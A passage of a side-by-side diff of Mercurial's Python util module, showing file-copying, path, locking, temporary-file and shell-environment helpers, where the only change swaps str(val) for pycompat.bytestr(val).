1029 1029 if cmd.startswith(name):
1030 1030 return fn(s, cmd[len(name):].lstrip())
1031 1031 return pipefilter(s, cmd)
1032 1032
1033 1033 def binary(s):
1034 1034 """return true if a string is binary data"""
1035 1035 return bool(s and '\0' in s)
1036 1036
1037 1037 def increasingchunks(source, min=1024, max=65536):
1038 1038 '''return no less than min bytes per chunk while data remains,
1039 1039 doubling min after each chunk until it reaches max'''
1040 1040 def log2(x):
1041 1041 if not x:
1042 1042 return 0
1043 1043 i = 0
1044 1044 while x:
1045 1045 x >>= 1
1046 1046 i += 1
1047 1047 return i - 1
1048 1048
1049 1049 buf = []
1050 1050 blen = 0
1051 1051 for chunk in source:
1052 1052 buf.append(chunk)
1053 1053 blen += len(chunk)
1054 1054 if blen >= min:
1055 1055 if min < max:
1056 1056 min = min << 1
1057 1057 nmin = 1 << log2(blen)
1058 1058 if nmin > min:
1059 1059 min = nmin
1060 1060 if min > max:
1061 1061 min = max
1062 1062 yield ''.join(buf)
1063 1063 blen = 0
1064 1064 buf = []
1065 1065 if buf:
1066 1066 yield ''.join(buf)
1067 1067
1068 1068 Abort = error.Abort
1069 1069
1070 1070 def always(fn):
1071 1071 return True
1072 1072
1073 1073 def never(fn):
1074 1074 return False
1075 1075
1076 1076 def nogc(func):
1077 1077 """disable garbage collector
1078 1078
1079 1079 Python's garbage collector triggers a GC each time a certain number of
1080 1080 container objects (the number being defined by gc.get_threshold()) are
1081 1081 allocated even when marked not to be tracked by the collector. Tracking has
1082 1082 no effect on when GCs are triggered, only on what objects the GC looks
1083 1083 into. As a workaround, disable GC while building complex (huge)
1084 1084 containers.
1085 1085
1086 1086 This garbage collector issue have been fixed in 2.7. But it still affect
1087 1087 CPython's performance.
1088 1088 """
1089 1089 def wrapper(*args, **kwargs):
1090 1090 gcenabled = gc.isenabled()
1091 1091 gc.disable()
1092 1092 try:
1093 1093 return func(*args, **kwargs)
1094 1094 finally:
1095 1095 if gcenabled:
1096 1096 gc.enable()
1097 1097 return wrapper
1098 1098
1099 1099 if pycompat.ispypy:
1100 1100 # PyPy runs slower with gc disabled
1101 1101 nogc = lambda x: x
1102 1102
1103 1103 def pathto(root, n1, n2):
1104 1104 '''return the relative path from one place to another.
1105 1105 root should use os.sep to separate directories
1106 1106 n1 should use os.sep to separate directories
1107 1107 n2 should use "/" to separate directories
1108 1108 returns an os.sep-separated path.
1109 1109
1110 1110 If n1 is a relative path, it's assumed it's
1111 1111 relative to root.
1112 1112 n2 should always be relative to root.
1113 1113 '''
1114 1114 if not n1:
1115 1115 return localpath(n2)
1116 1116 if os.path.isabs(n1):
1117 1117 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1118 1118 return os.path.join(root, localpath(n2))
1119 1119 n2 = '/'.join((pconvert(root), n2))
1120 1120 a, b = splitpath(n1), n2.split('/')
1121 1121 a.reverse()
1122 1122 b.reverse()
1123 1123 while a and b and a[-1] == b[-1]:
1124 1124 a.pop()
1125 1125 b.pop()
1126 1126 b.reverse()
1127 1127 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1128 1128
1129 1129 def mainfrozen():
1130 1130 """return True if we are a frozen executable.
1131 1131
1132 1132 The code supports py2exe (most common, Windows only) and tools/freeze
1133 1133 (portable, not much used).
1134 1134 """
1135 1135 return (safehasattr(sys, "frozen") or # new py2exe
1136 1136 safehasattr(sys, "importers") or # old py2exe
1137 1137 imp.is_frozen(u"__main__")) # tools/freeze
1138 1138
1139 1139 # the location of data files matching the source code
1140 1140 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1141 1141 # executable version (py2exe) doesn't support __file__
1142 1142 datapath = os.path.dirname(pycompat.sysexecutable)
1143 1143 else:
1144 1144 datapath = os.path.dirname(pycompat.fsencode(__file__))
1145 1145
1146 1146 i18n.setdatapath(datapath)
1147 1147
1148 1148 _hgexecutable = None
1149 1149
1150 1150 def hgexecutable():
1151 1151 """return location of the 'hg' executable.
1152 1152
1153 1153 Defaults to $HG or 'hg' in the search path.
1154 1154 """
1155 1155 if _hgexecutable is None:
1156 1156 hg = encoding.environ.get('HG')
1157 1157 mainmod = sys.modules[pycompat.sysstr('__main__')]
1158 1158 if hg:
1159 1159 _sethgexecutable(hg)
1160 1160 elif mainfrozen():
1161 1161 if getattr(sys, 'frozen', None) == 'macosx_app':
1162 1162 # Env variable set by py2app
1163 1163 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1164 1164 else:
1165 1165 _sethgexecutable(pycompat.sysexecutable)
1166 1166 elif (os.path.basename(
1167 1167 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1168 1168 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1169 1169 else:
1170 1170 exe = findexe('hg') or os.path.basename(sys.argv[0])
1171 1171 _sethgexecutable(exe)
1172 1172 return _hgexecutable
1173 1173
1174 1174 def _sethgexecutable(path):
1175 1175 """set location of the 'hg' executable"""
1176 1176 global _hgexecutable
1177 1177 _hgexecutable = path
1178 1178
1179 1179 def _isstdout(f):
1180 1180 fileno = getattr(f, 'fileno', None)
1181 1181 return fileno and fileno() == sys.__stdout__.fileno()
1182 1182
1183 1183 def shellenviron(environ=None):
1184 1184 """return environ with optional override, useful for shelling out"""
1185 1185 def py2shell(val):
1186 1186 'convert python object into string that is useful to shell'
1187 1187 if val is None or val is False:
1188 1188 return '0'
1189 1189 if val is True:
1190 1190 return '1'
1191 return str(val)
1191 return pycompat.bytestr(val)
1192 1192 env = dict(encoding.environ)
1193 1193 if environ:
1194 1194 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1195 1195 env['HG'] = hgexecutable()
1196 1196 return env
1197 1197
1198 1198 def system(cmd, environ=None, cwd=None, out=None):
1199 1199 '''enhanced shell command execution.
1200 1200 run with environment maybe modified, maybe in different dir.
1201 1201
1202 1202 if out is specified, it is assumed to be a file-like object that has a
1203 1203 write() method. stdout and stderr will be redirected to out.'''
1204 1204 try:
1205 1205 stdout.flush()
1206 1206 except Exception:
1207 1207 pass
1208 1208 cmd = quotecommand(cmd)
1209 1209 env = shellenviron(environ)
1210 1210 if out is None or _isstdout(out):
1211 1211 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1212 1212 env=env, cwd=cwd)
1213 1213 else:
1214 1214 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1215 1215 env=env, cwd=cwd, stdout=subprocess.PIPE,
1216 1216 stderr=subprocess.STDOUT)
1217 1217 for line in iter(proc.stdout.readline, ''):
1218 1218 out.write(line)
1219 1219 proc.wait()
1220 1220 rc = proc.returncode
1221 1221 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1222 1222 rc = 0
1223 1223 return rc
1224 1224
1225 1225 def checksignature(func):
1226 1226 '''wrap a function with code to check for calling errors'''
1227 1227 def check(*args, **kwargs):
1228 1228 try:
1229 1229 return func(*args, **kwargs)
1230 1230 except TypeError:
1231 1231 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1232 1232 raise error.SignatureError
1233 1233 raise
1234 1234
1235 1235 return check
1236 1236
1237 1237 # a whilelist of known filesystems where hardlink works reliably
1238 1238 _hardlinkfswhitelist = {
1239 1239 'btrfs',
1240 1240 'ext2',
1241 1241 'ext3',
1242 1242 'ext4',
1243 1243 'hfs',
1244 1244 'jfs',
1245 1245 'NTFS',
1246 1246 'reiserfs',
1247 1247 'tmpfs',
1248 1248 'ufs',
1249 1249 'xfs',
1250 1250 'zfs',
1251 1251 }
1252 1252
1253 1253 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1254 1254 '''copy a file, preserving mode and optionally other stat info like
1255 1255 atime/mtime
1256 1256
1257 1257 checkambig argument is used with filestat, and is useful only if
1258 1258 destination file is guarded by any lock (e.g. repo.lock or
1259 1259 repo.wlock).
1260 1260
1261 1261 copystat and checkambig should be exclusive.
1262 1262 '''
1263 1263 assert not (copystat and checkambig)
1264 1264 oldstat = None
1265 1265 if os.path.lexists(dest):
1266 1266 if checkambig:
1267 1267 oldstat = checkambig and filestat.frompath(dest)
1268 1268 unlink(dest)
1269 1269 if hardlink:
1270 1270 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1271 1271 # unless we are confident that dest is on a whitelisted filesystem.
1272 1272 try:
1273 1273 fstype = getfstype(os.path.dirname(dest))
1274 1274 except OSError:
1275 1275 fstype = None
1276 1276 if fstype not in _hardlinkfswhitelist:
1277 1277 hardlink = False
1278 1278 if hardlink:
1279 1279 try:
1280 1280 oslink(src, dest)
1281 1281 return
1282 1282 except (IOError, OSError):
1283 1283 pass # fall back to normal copy
1284 1284 if os.path.islink(src):
1285 1285 os.symlink(os.readlink(src), dest)
1286 1286 # copytime is ignored for symlinks, but in general copytime isn't needed
1287 1287 # for them anyway
1288 1288 else:
1289 1289 try:
1290 1290 shutil.copyfile(src, dest)
1291 1291 if copystat:
1292 1292 # copystat also copies mode
1293 1293 shutil.copystat(src, dest)
1294 1294 else:
1295 1295 shutil.copymode(src, dest)
1296 1296 if oldstat and oldstat.stat:
1297 1297 newstat = filestat.frompath(dest)
1298 1298 if newstat.isambig(oldstat):
1299 1299 # stat of copied file is ambiguous to original one
1300 1300 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1301 1301 os.utime(dest, (advanced, advanced))
1302 1302 except shutil.Error as inst:
1303 1303 raise Abort(str(inst))
1304 1304
1305 1305 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1306 1306 """Copy a directory tree using hardlinks if possible."""
1307 1307 num = 0
1308 1308
1309 1309 gettopic = lambda: hardlink and _('linking') or _('copying')
1310 1310
1311 1311 if os.path.isdir(src):
1312 1312 if hardlink is None:
1313 1313 hardlink = (os.stat(src).st_dev ==
1314 1314 os.stat(os.path.dirname(dst)).st_dev)
1315 1315 topic = gettopic()
1316 1316 os.mkdir(dst)
1317 1317 for name, kind in listdir(src):
1318 1318 srcname = os.path.join(src, name)
1319 1319 dstname = os.path.join(dst, name)
1320 1320 def nprog(t, pos):
1321 1321 if pos is not None:
1322 1322 return progress(t, pos + num)
1323 1323 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1324 1324 num += n
1325 1325 else:
1326 1326 if hardlink is None:
1327 1327 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1328 1328 os.stat(os.path.dirname(dst)).st_dev)
1329 1329 topic = gettopic()
1330 1330
1331 1331 if hardlink:
1332 1332 try:
1333 1333 oslink(src, dst)
1334 1334 except (IOError, OSError):
1335 1335 hardlink = False
1336 1336 shutil.copy(src, dst)
1337 1337 else:
1338 1338 shutil.copy(src, dst)
1339 1339 num += 1
1340 1340 progress(topic, num)
1341 1341 progress(topic, None)
1342 1342
1343 1343 return hardlink, num
1344 1344
1345 1345 _winreservednames = {
1346 1346 'con', 'prn', 'aux', 'nul',
1347 1347 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1348 1348 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1349 1349 }
1350 1350 _winreservedchars = ':*?"<>|'
1351 1351 def checkwinfilename(path):
1352 1352 r'''Check that the base-relative path is a valid filename on Windows.
1353 1353 Returns None if the path is ok, or a UI string describing the problem.
1354 1354
1355 1355 >>> checkwinfilename(b"just/a/normal/path")
1356 1356 >>> checkwinfilename(b"foo/bar/con.xml")
1357 1357 "filename contains 'con', which is reserved on Windows"
1358 1358 >>> checkwinfilename(b"foo/con.xml/bar")
1359 1359 "filename contains 'con', which is reserved on Windows"
1360 1360 >>> checkwinfilename(b"foo/bar/xml.con")
1361 1361 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1362 1362 "filename contains 'AUX', which is reserved on Windows"
1363 1363 >>> checkwinfilename(b"foo/bar/bla:.txt")
1364 1364 "filename contains ':', which is reserved on Windows"
1365 1365 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1366 1366 "filename contains '\\x07', which is invalid on Windows"
1367 1367 >>> checkwinfilename(b"foo/bar/bla ")
1368 1368 "filename ends with ' ', which is not allowed on Windows"
1369 1369 >>> checkwinfilename(b"../bar")
1370 1370 >>> checkwinfilename(b"foo\\")
1371 1371 "filename ends with '\\', which is invalid on Windows"
1372 1372 >>> checkwinfilename(b"foo\\/bar")
1373 1373 "directory name ends with '\\', which is invalid on Windows"
1374 1374 '''
1375 1375 if path.endswith('\\'):
1376 1376 return _("filename ends with '\\', which is invalid on Windows")
1377 1377 if '\\/' in path:
1378 1378 return _("directory name ends with '\\', which is invalid on Windows")
1379 1379 for n in path.replace('\\', '/').split('/'):
1380 1380 if not n:
1381 1381 continue
1382 1382 for c in _filenamebytestr(n):
1383 1383 if c in _winreservedchars:
1384 1384 return _("filename contains '%s', which is reserved "
1385 1385 "on Windows") % c
1386 1386 if ord(c) <= 31:
1387 1387 return _("filename contains '%s', which is invalid "
1388 1388 "on Windows") % escapestr(c)
1389 1389 base = n.split('.')[0]
1390 1390 if base and base.lower() in _winreservednames:
1391 1391 return _("filename contains '%s', which is reserved "
1392 1392 "on Windows") % base
1393 1393 t = n[-1:]
1394 1394 if t in '. ' and n not in '..':
1395 1395 return _("filename ends with '%s', which is not allowed "
1396 1396 "on Windows") % t
1397 1397
1398 1398 if pycompat.iswindows:
1399 1399 checkosfilename = checkwinfilename
1400 1400 timer = time.clock
1401 1401 else:
1402 1402 checkosfilename = platform.checkosfilename
1403 1403 timer = time.time
1404 1404
1405 1405 if safehasattr(time, "perf_counter"):
1406 1406 timer = time.perf_counter
1407 1407
1408 1408 def makelock(info, pathname):
1409 1409 try:
1410 1410 return os.symlink(info, pathname)
1411 1411 except OSError as why:
1412 1412 if why.errno == errno.EEXIST:
1413 1413 raise
1414 1414 except AttributeError: # no symlink in os
1415 1415 pass
1416 1416
1417 1417 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1418 1418 os.write(ld, info)
1419 1419 os.close(ld)
1420 1420
1421 1421 def readlock(pathname):
1422 1422 try:
1423 1423 return os.readlink(pathname)
1424 1424 except OSError as why:
1425 1425 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1426 1426 raise
1427 1427 except AttributeError: # no symlink in os
1428 1428 pass
1429 1429 fp = posixfile(pathname)
1430 1430 r = fp.read()
1431 1431 fp.close()
1432 1432 return r
1433 1433
1434 1434 def fstat(fp):
1435 1435 '''stat file object that may not have fileno method.'''
1436 1436 try:
1437 1437 return os.fstat(fp.fileno())
1438 1438 except AttributeError:
1439 1439 return os.stat(fp.name)
1440 1440
1441 1441 # File system features
1442 1442
1443 1443 def fscasesensitive(path):
1444 1444 """
1445 1445 Return true if the given path is on a case-sensitive filesystem
1446 1446
1447 1447 Requires a path (like /foo/.hg) ending with a foldable final
1448 1448 directory component.
1449 1449 """
1450 1450 s1 = os.lstat(path)
1451 1451 d, b = os.path.split(path)
1452 1452 b2 = b.upper()
1453 1453 if b == b2:
1454 1454 b2 = b.lower()
1455 1455 if b == b2:
1456 1456 return True # no evidence against case sensitivity
1457 1457 p2 = os.path.join(d, b2)
1458 1458 try:
1459 1459 s2 = os.lstat(p2)
1460 1460 if s2 == s1:
1461 1461 return False
1462 1462 return True
1463 1463 except OSError:
1464 1464 return True
1465 1465
1466 1466 try:
1467 1467 import re2
1468 1468 _re2 = None
1469 1469 except ImportError:
1470 1470 _re2 = False
1471 1471
1472 1472 class _re(object):
1473 1473 def _checkre2(self):
1474 1474 global _re2
1475 1475 try:
1476 1476 # check if match works, see issue3964
1477 1477 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1478 1478 except ImportError:
1479 1479 _re2 = False
1480 1480
1481 1481 def compile(self, pat, flags=0):
1482 1482 '''Compile a regular expression, using re2 if possible
1483 1483
1484 1484 For best performance, use only re2-compatible regexp features. The
1485 1485 only flags from the re module that are re2-compatible are
1486 1486 IGNORECASE and MULTILINE.'''
1487 1487 if _re2 is None:
1488 1488 self._checkre2()
1489 1489 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1490 1490 if flags & remod.IGNORECASE:
1491 1491 pat = '(?i)' + pat
1492 1492 if flags & remod.MULTILINE:
1493 1493 pat = '(?m)' + pat
1494 1494 try:
1495 1495 return re2.compile(pat)
1496 1496 except re2.error:
1497 1497 pass
1498 1498 return remod.compile(pat, flags)
1499 1499
1500 1500 @propertycache
1501 1501 def escape(self):
1502 1502 '''Return the version of escape corresponding to self.compile.
1503 1503
1504 1504 This is imperfect because whether re2 or re is used for a particular
1505 1505 function depends on the flags, etc, but it's the best we can do.
1506 1506 '''
1507 1507 global _re2
1508 1508 if _re2 is None:
1509 1509 self._checkre2()
1510 1510 if _re2:
1511 1511 return re2.escape
1512 1512 else:
1513 1513 return remod.escape
1514 1514
1515 1515 re = _re()
1516 1516
1517 1517 _fspathcache = {}
1518 1518 def fspath(name, root):
1519 1519 '''Get name in the case stored in the filesystem
1520 1520
1521 1521 The name should be relative to root, and be normcase-ed for efficiency.
1522 1522
1523 1523 Note that this function is unnecessary, and should not be
1524 1524 called, for case-sensitive filesystems (simply because it's expensive).
1525 1525
1526 1526 The root should be normcase-ed, too.
1527 1527 '''
1528 1528 def _makefspathcacheentry(dir):
1529 1529 return dict((normcase(n), n) for n in os.listdir(dir))
1530 1530
1531 1531 seps = pycompat.ossep
1532 1532 if pycompat.osaltsep:
1533 1533 seps = seps + pycompat.osaltsep
1534 1534 # Protect backslashes. This gets silly very quickly.
1535 1535 seps.replace('\\','\\\\')
1536 1536 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1537 1537 dir = os.path.normpath(root)
1538 1538 result = []
1539 1539 for part, sep in pattern.findall(name):
1540 1540 if sep:
1541 1541 result.append(sep)
1542 1542 continue
1543 1543
1544 1544 if dir not in _fspathcache:
1545 1545 _fspathcache[dir] = _makefspathcacheentry(dir)
1546 1546 contents = _fspathcache[dir]
1547 1547
1548 1548 found = contents.get(part)
1549 1549 if not found:
1550 1550 # retry "once per directory" per "dirstate.walk" which
1551 1551 # may take place for each patches of "hg qpush", for example
1552 1552 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1553 1553 found = contents.get(part)
1554 1554
1555 1555 result.append(found or part)
1556 1556 dir = os.path.join(dir, part)
1557 1557
1558 1558 return ''.join(result)
1559 1559
1560 1560 def checknlink(testfile):
1561 1561 '''check whether hardlink count reporting works properly'''
1562 1562
1563 1563 # testfile may be open, so we need a separate file for checking to
1564 1564 # work around issue2543 (or testfile may get lost on Samba shares)
1565 1565 f1, f2, fp = None, None, None
1566 1566 try:
1567 1567 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1568 1568 suffix='1~', dir=os.path.dirname(testfile))
1569 1569 os.close(fd)
1570 1570 f2 = '%s2~' % f1[:-2]
1571 1571
1572 1572 oslink(f1, f2)
1573 1573 # nlinks() may behave differently for files on Windows shares if
1574 1574 # the file is open.
1575 1575 fp = posixfile(f2)
1576 1576 return nlinks(f2) > 1
1577 1577 except OSError:
1578 1578 return False
1579 1579 finally:
1580 1580 if fp is not None:
1581 1581 fp.close()
1582 1582 for f in (f1, f2):
1583 1583 try:
1584 1584 if f is not None:
1585 1585 os.unlink(f)
1586 1586 except OSError:
1587 1587 pass
1588 1588
1589 1589 def endswithsep(path):
1590 1590 '''Check path ends with os.sep or os.altsep.'''
1591 1591 return (path.endswith(pycompat.ossep)
1592 1592 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1593 1593
1594 1594 def splitpath(path):
1595 1595 '''Split path by os.sep.
1596 1596 Note that this function does not use os.altsep because this is
1597 1597 an alternative of simple "xxx.split(os.sep)".
1598 1598 It is recommended to use os.path.normpath() before using this
1599 1599 function if need.'''
1600 1600 return path.split(pycompat.ossep)
1601 1601
1602 1602 def gui():
1603 1603 '''Are we running in a GUI?'''
1604 1604 if pycompat.isdarwin:
1605 1605 if 'SSH_CONNECTION' in encoding.environ:
1606 1606 # handle SSH access to a box where the user is logged in
1607 1607 return False
1608 1608 elif getattr(osutil, 'isgui', None):
1609 1609 # check if a CoreGraphics session is available
1610 1610 return osutil.isgui()
1611 1611 else:
1612 1612 # pure build; use a safe default
1613 1613 return True
1614 1614 else:
1615 1615 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1616 1616
1617 1617 def mktempcopy(name, emptyok=False, createmode=None):
1618 1618 """Create a temporary file with the same contents from name
1619 1619
1620 1620 The permission bits are copied from the original file.
1621 1621
1622 1622 If the temporary file is going to be truncated immediately, you
1623 1623 can use emptyok=True as an optimization.
1624 1624
1625 1625 Returns the name of the temporary file.
1626 1626 """
1627 1627 d, fn = os.path.split(name)
1628 1628 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1629 1629 os.close(fd)
1630 1630 # Temporary files are created with mode 0600, which is usually not
1631 1631 # what we want. If the original file already exists, just copy
1632 1632 # its mode. Otherwise, manually obey umask.
1633 1633 copymode(name, temp, createmode)
1634 1634 if emptyok:
1635 1635 return temp
1636 1636 try:
1637 1637 try:
1638 1638 ifp = posixfile(name, "rb")
1639 1639 except IOError as inst:
1640 1640 if inst.errno == errno.ENOENT:
1641 1641 return temp
1642 1642 if not getattr(inst, 'filename', None):
1643 1643 inst.filename = name
1644 1644 raise
1645 1645 ofp = posixfile(temp, "wb")
1646 1646 for chunk in filechunkiter(ifp):
1647 1647 ofp.write(chunk)
1648 1648 ifp.close()
1649 1649 ofp.close()
1650 1650 except: # re-raises
1651 1651 try:
1652 1652 os.unlink(temp)
1653 1653 except OSError:
1654 1654 pass
1655 1655 raise
1656 1656 return temp
1657 1657
1658 1658 class filestat(object):
1659 1659 """help to exactly detect change of a file
1660 1660
1661 1661 'stat' attribute is result of 'os.stat()' if specified 'path'
1662 1662 exists. Otherwise, it is None. This can avoid preparative
1663 1663 'exists()' examination on client side of this class.
1664 1664 """
1665 1665 def __init__(self, stat):
1666 1666 self.stat = stat
1667 1667
1668 1668 @classmethod
1669 1669 def frompath(cls, path):
1670 1670 try:
1671 1671 stat = os.stat(path)
1672 1672 except OSError as err:
1673 1673 if err.errno != errno.ENOENT:
1674 1674 raise
1675 1675 stat = None
1676 1676 return cls(stat)
1677 1677
1678 1678 @classmethod
1679 1679 def fromfp(cls, fp):
1680 1680 stat = os.fstat(fp.fileno())
1681 1681 return cls(stat)
1682 1682
1683 1683 __hash__ = object.__hash__
1684 1684
1685 1685 def __eq__(self, old):
1686 1686 try:
1687 1687 # if ambiguity between stat of new and old file is
1688 1688 # avoided, comparison of size, ctime and mtime is enough
1689 1689 # to exactly detect change of a file regardless of platform
1690 1690 return (self.stat.st_size == old.stat.st_size and
1691 1691 self.stat.st_ctime == old.stat.st_ctime and
1692 1692 self.stat.st_mtime == old.stat.st_mtime)
1693 1693 except AttributeError:
1694 1694 pass
1695 1695 try:
1696 1696 return self.stat is None and old.stat is None
1697 1697 except AttributeError:
1698 1698 return False
1699 1699
1700 1700 def isambig(self, old):
1701 1701 """Examine whether new (= self) stat is ambiguous against old one
1702 1702
1703 1703 "S[N]" below means stat of a file at N-th change:
1704 1704
1705 1705 - S[n-1].ctime < S[n].ctime: can detect change of a file
1706 1706 - S[n-1].ctime == S[n].ctime
1707 1707 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1708 1708 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1709 1709 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1710 1710 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1711 1711
1712 1712 Case (*2) above means that a file was changed twice or more at
1713 1713 same time in sec (= S[n-1].ctime), and comparison of timestamp
1714 1714 is ambiguous.
1715 1715
1716 1716 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1717 1717 timestamp is ambiguous".
1718 1718
1719 1719 But advancing mtime only in case (*2) doesn't work as
1720 1720 expected, because naturally advanced S[n].mtime in case (*1)
1721 1721 might be equal to manually advanced S[n-1 or earlier].mtime.
1722 1722
1723 1723 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1724 1724 treated as ambiguous regardless of mtime, to avoid overlooking
1725 1725 by confliction between such mtime.
1726 1726
1727 1727 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1728 1728 S[n].mtime", even if size of a file isn't changed.
1729 1729 """
1730 1730 try:
1731 1731 return (self.stat.st_ctime == old.stat.st_ctime)
1732 1732 except AttributeError:
1733 1733 return False
1734 1734
1735 1735 def avoidambig(self, path, old):
1736 1736 """Change file stat of specified path to avoid ambiguity
1737 1737
1738 1738 'old' should be previous filestat of 'path'.
1739 1739
1740 1740 This skips avoiding ambiguity, if a process doesn't have
1741 1741 appropriate privileges for 'path'. This returns False in this
1742 1742 case.
1743 1743
1744 1744 Otherwise, this returns True, as "ambiguity is avoided".
1745 1745 """
1746 1746 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1747 1747 try:
1748 1748 os.utime(path, (advanced, advanced))
1749 1749 except OSError as inst:
1750 1750 if inst.errno == errno.EPERM:
1751 1751 # utime() on the file created by another user causes EPERM,
1752 1752 # if a process doesn't have appropriate privileges
1753 1753 return False
1754 1754 raise
1755 1755 return True
1756 1756
1757 1757 def __ne__(self, other):
1758 1758 return not self == other
1759 1759
1760 1760 class atomictempfile(object):
1761 1761 '''writable file object that atomically updates a file
1762 1762
1763 1763 All writes will go to a temporary copy of the original file. Call
1764 1764 close() when you are done writing, and atomictempfile will rename
1765 1765 the temporary copy to the original name, making the changes
1766 1766 visible. If the object is destroyed without being closed, all your
1767 1767 writes are discarded.
1768 1768
1769 1769 checkambig argument of constructor is used with filestat, and is
1770 1770 useful only if target file is guarded by any lock (e.g. repo.lock
1771 1771 or repo.wlock).
1772 1772 '''
1773 1773 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1774 1774 self.__name = name # permanent name
1775 1775 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1776 1776 createmode=createmode)
1777 1777 self._fp = posixfile(self._tempname, mode)
1778 1778 self._checkambig = checkambig
1779 1779
1780 1780 # delegated methods
1781 1781 self.read = self._fp.read
1782 1782 self.write = self._fp.write
1783 1783 self.seek = self._fp.seek
1784 1784 self.tell = self._fp.tell
1785 1785 self.fileno = self._fp.fileno
1786 1786
1787 1787 def close(self):
1788 1788 if not self._fp.closed:
1789 1789 self._fp.close()
1790 1790 filename = localpath(self.__name)
1791 1791 oldstat = self._checkambig and filestat.frompath(filename)
1792 1792 if oldstat and oldstat.stat:
1793 1793 rename(self._tempname, filename)
1794 1794 newstat = filestat.frompath(filename)
1795 1795 if newstat.isambig(oldstat):
1796 1796 # stat of changed file is ambiguous to original one
1797 1797 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1798 1798 os.utime(filename, (advanced, advanced))
1799 1799 else:
1800 1800 rename(self._tempname, filename)
1801 1801
1802 1802 def discard(self):
1803 1803 if not self._fp.closed:
1804 1804 try:
1805 1805 os.unlink(self._tempname)
1806 1806 except OSError:
1807 1807 pass
1808 1808 self._fp.close()
1809 1809
1810 1810 def __del__(self):
1811 1811 if safehasattr(self, '_fp'): # constructor actually did something
1812 1812 self.discard()
1813 1813
1814 1814 def __enter__(self):
1815 1815 return self
1816 1816
1817 1817 def __exit__(self, exctype, excvalue, traceback):
1818 1818 if exctype is not None:
1819 1819 self.discard()
1820 1820 else:
1821 1821 self.close()
1822 1822
1823 1823 def unlinkpath(f, ignoremissing=False):
1824 1824 """unlink and remove the directory if it is empty"""
1825 1825 if ignoremissing:
1826 1826 tryunlink(f)
1827 1827 else:
1828 1828 unlink(f)
1829 1829 # try removing directories that might now be empty
1830 1830 try:
1831 1831 removedirs(os.path.dirname(f))
1832 1832 except OSError:
1833 1833 pass
1834 1834
1835 1835 def tryunlink(f):
1836 1836 """Attempt to remove a file, ignoring ENOENT errors."""
1837 1837 try:
1838 1838 unlink(f)
1839 1839 except OSError as e:
1840 1840 if e.errno != errno.ENOENT:
1841 1841 raise
1842 1842
1843 1843 def makedirs(name, mode=None, notindexed=False):
1844 1844 """recursive directory creation with parent mode inheritance
1845 1845
1846 1846 Newly created directories are marked as "not to be indexed by
1847 1847 the content indexing service", if ``notindexed`` is specified
1848 1848 for "write" mode access.
1849 1849 """
1850 1850 try:
1851 1851 makedir(name, notindexed)
1852 1852 except OSError as err:
1853 1853 if err.errno == errno.EEXIST:
1854 1854 return
1855 1855 if err.errno != errno.ENOENT or not name:
1856 1856 raise
1857 1857 parent = os.path.dirname(os.path.abspath(name))
1858 1858 if parent == name:
1859 1859 raise
1860 1860 makedirs(parent, mode, notindexed)
1861 1861 try:
1862 1862 makedir(name, notindexed)
1863 1863 except OSError as err:
1864 1864 # Catch EEXIST to handle races
1865 1865 if err.errno == errno.EEXIST:
1866 1866 return
1867 1867 raise
1868 1868 if mode is not None:
1869 1869 os.chmod(name, mode)
1870 1870
1871 1871 def readfile(path):
1872 1872 with open(path, 'rb') as fp:
1873 1873 return fp.read()
1874 1874
1875 1875 def writefile(path, text):
1876 1876 with open(path, 'wb') as fp:
1877 1877 fp.write(text)
1878 1878
1879 1879 def appendfile(path, text):
1880 1880 with open(path, 'ab') as fp:
1881 1881 fp.write(text)
1882 1882
1883 1883 class chunkbuffer(object):
1884 1884 """Allow arbitrary sized chunks of data to be efficiently read from an
1885 1885 iterator over chunks of arbitrary size."""
1886 1886
1887 1887 def __init__(self, in_iter):
1888 1888 """in_iter is the iterator that's iterating over the input chunks."""
1889 1889 def splitbig(chunks):
1890 1890 for chunk in chunks:
1891 1891 if len(chunk) > 2**20:
1892 1892 pos = 0
1893 1893 while pos < len(chunk):
1894 1894 end = pos + 2 ** 18
